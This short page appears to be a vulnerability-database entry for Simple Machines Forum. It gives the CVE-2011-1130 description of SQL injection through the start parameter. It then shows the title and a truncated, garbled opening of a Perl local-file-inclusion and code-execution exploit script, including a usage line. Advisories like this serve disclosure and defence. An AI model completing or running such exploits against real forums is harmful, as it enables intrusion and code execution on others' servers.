CVE-2011-1130

Simple Machines Forum SMF before 1.1.13, and 2.x before 2.0 RC5, does not properly validate the start parameter, which might allow remote attackers to conduct SQL injection attacks, obtain sensitive information, or cause a denial of service via a crafted value, related to the cleanRequest functio...

Simple Machines Forum (SMF) 1.1.6 - Local File Inclusion / Code Execution

!/usr/bin/perl @title: Simple Machines Forum Code Execution @versn: perl P:\advisories\smf\smflocalfileinclude.pl -s http://localhost/audit/smf116 -u regular -p test -d ii 0day Simple Machines Forum new cookiejar = , agent = "Mozilla FireFox" ; my %parms = s = "", d = 0, x = sub print " Proxy...